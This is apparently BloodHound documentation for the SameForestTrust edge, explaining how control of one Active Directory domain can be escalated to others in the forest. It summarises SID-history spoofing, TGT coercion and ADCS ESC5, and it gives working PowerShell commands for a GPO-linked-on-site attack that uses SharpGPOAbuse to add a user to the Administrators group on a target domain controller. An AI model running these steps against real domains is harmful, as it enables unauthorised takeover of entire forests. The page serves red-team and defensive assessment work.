> ## Documentation Index > Fetch the complete documentation index at: https://bloodhound.specterops.io/llms.txt > Use this file to discover all available pages before exploring further. # SameForestTrust > The SameForestTrust edge represents a trust relationship between two domains within the same AD forest. Applies to BloodHound Enterprise and CE In this relationship, the source node domain has a same-forest (intraforest) trust to the destination node domain, allowing principals (users and computers) from the destination domain to access resources in the source domain. Because the domains are part of the same forest, they inherently trust each other, granting implicit control over resources across domains. ## Abuse Info An attacker with control over any domain within the forest can escalate their privileges to compromise other domains through multiple methods. ### **Spoof SID history** An attacker can spoof the SID history of a principal in the target domain, tricking the target domain into treating the attacker as a privileged user. See the [SpoofSIDHistory](/resources/edges/spoof-sid-history) edge for more information. This attack fails if SID filtering (quarantine) is enabled on the trust relationship in the opposite direction of the attack. The SID filtering blocks SIDs belonging to any other domain than the attacker-controlled domain. However, enabling this setting is rare and generally not recommended. ### **Coerce to TGT** An attacker can coerce a privileged computer (e.g., a DC) in the target domain to authenticate to an attacker-controlled computer configured with unconstrained delegation. This provides the attacker with a Kerberos TGT for the coerced computer. See the [CoerceToTGT](/resources/edges/coerce-to-tgt) edge for more information. The attack fails if SID filtering (quarantine) is enabled, as this prevents TGTs from being sent across the trust boundary. Again, this setting is rarely configured. ### **ADCS ESC5** The Configuration Naming Context (NC) is a forest-wide partition writable by any DC within the forest. Most Active Directory Certificate Services (ADCS) configurations are stored in the Configuration NC. An attacker can abuse a DC to modify ADCS configurations to enable an ADCS domain escalation opportunity that compromises the entire forest. **Attack Steps:** 1. Obtain a SYSTEM session on a DC in the attacker-controlled domain 2. Create a certificate template allowing ESC1 abuse 3. Publish the certificate template to an enterprise CA 4. Enroll the certificate as a privileged user in the target domain 5. Authenticate as the privileged user in the target domain using the certificate See this blog post for further details: [From DA to EA with ESC5](https://specterops.io/blog/2023/05/16/from-da-to-ea-with-esc5/). If ADCS is not installed: An attacker can install ADCS and exploit it, as detailed in the blog post: [Escalating from child domain’s admins to enterprise admins in 5 minutes by abusing AD CS, a follow up](https://www.pkisolutions.com/escalating-from-child-domains-admins-to-enterprise-admins-in-5-minutes-by-abusing-ad-cs-a-follow-up/). ### **GPO linked on Site** AD sites are stored in the forest-wide Configuration NC partition, writable by any DC within the forest. An attacker with SYSTEM access to a DC can link a malicious GPO to the site of any DC in the forest. **Step 1: Obtain a SYSTEM session on a DC in the attacker-controlled domain** Use PsExec to start a PowerShell terminal as SYSTEM on the DC: ```powershell theme={null} PsExec64.exe -s -i -accepteula powershell ``` **Step 2: Create a GPO** Use the GroupPolicy module of RSAT to create the new GPO: ```powershell theme={null} New-GPO -Name "MyGPO" ``` **Step 3: Add the compromising setting to the GPO** Use SharpGPOAbuse to add a scheduled task: ```powershell theme={null} .\SharpGPOAbuse.exe --AddComputerTask --TaskName "MyTask" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c net localgroup Administrators /Add DUMPSTER\tim" --GPOName "MyGPO" ``` **Step 4: Identify a target DC and its site** Use the ActiveDirectory module of RSAT to query for DCs in the target domain: ```powershell theme={null} Get-ADDomainController -server bastion.local | select Name,Site ``` Look up the site DistinguishedName: ```powershell theme={null} Get-ADReplicationSite Default-First-Site-Name | select DistinguishedName ``` **Step 5: Set the GPO permissions** This step is important to avoid applying the GPO to all computers connected to the site. Use the GroupPolicy module of RSAT to modify the permissions such that Authenticated Users can read the object but only the targeted computer applies the GPO settings: ```powershell theme={null} $GPO = Get-GPO -Name "MyGPO" $GPO | Set-GPPermissions -PermissionLevel GpoRead -TargetName "Authenticated Users" -TargetType Group -Replace $GPO | Set-GPPermissions -PermissionLevel GpoApply -TargetName "BASTION\\bldc01" -TargetType Computer ``` **Step 6: Link the GPO to the site** Use the GroupPolicy module of RSAT to link the GPO to the site: ```powershell theme={null} New-GPLink -Name "MyGPO" -Target "CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=bastion,DC=local" -Server dc01.dumpster.fire ``` Note that you must specify the server to be the DC where you are running the command, as the command defaults to execute the change on a root domain DC where the compromised DC does not have the permissions to link the GPO. Wait until replication has happened and the GPO has applied on the target DC, and log in with Administrators access on the compromised DC. Replication within the same site happens within 15 seconds but runs on 3 hour schedule by default across sites. GPOs are applied on a 90-120 min interval by default. ## Opsec Considerations There is no OPSEC associated with this edge. ## Edge Schema Source: [Domain](/resources/nodes/domain)\ Destination: [Domain](/resources/nodes/domain)\ Traversable: **Yes** ## References This edge is related to the following MITRE ATT\&CK tactic and techniques: * [T1134.005: Access Token Manipulation: SID-History Injection](https://attack.mitre.org/techniques/T1134/005/) * [T1187: Forced Authentication](https://attack.mitre.org/techniques/T1187/) * [T1649: Steal or Forge Authentication Certificates](https://attack.mitre.org/techniques/T1649/) * [T1558: Steal or Forge Kerberos Tickets](https://attack.mitre.org/techniques/T1558/) * [T1550.003: Use Alternate Authentication Material: Pass the Ticket](https://attack.mitre.org/techniques/T1550/003/) * [T1484.001: Domain or Tenant Policy Modification: Group Policy Modification](https://attack.mitre.org/techniques/T1484/001/) Abuse info references: * [Microsoft AD Trust Technical Documentation](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc755321\(v=ws.10\)) * [From DA to EA with ESC5](https://specterops.io/blog/2023/05/16/from-da-to-ea-with-esc5/) * [Escalating from child domain’s admins to enterprise admins in 5 minutes by abusing AD CS, a follow up](https://www.pkisolutions.com/escalating-from-child-domains-admins-to-enterprise-admins-in-5-minutes-by-abusing-ad-cs-a-follow-up/) * [SID filter as security boundary between domains? (Part 4)](https://blog.improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research) * [SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse) * [Good Fences Make Good Neighbors: New AD Trusts Attack Paths in BloodHound](https://specterops.io/blog/2025/06/25/good-fences-make-good-neighbors-new-ad-trusts-attack-paths-in-bloodhound/)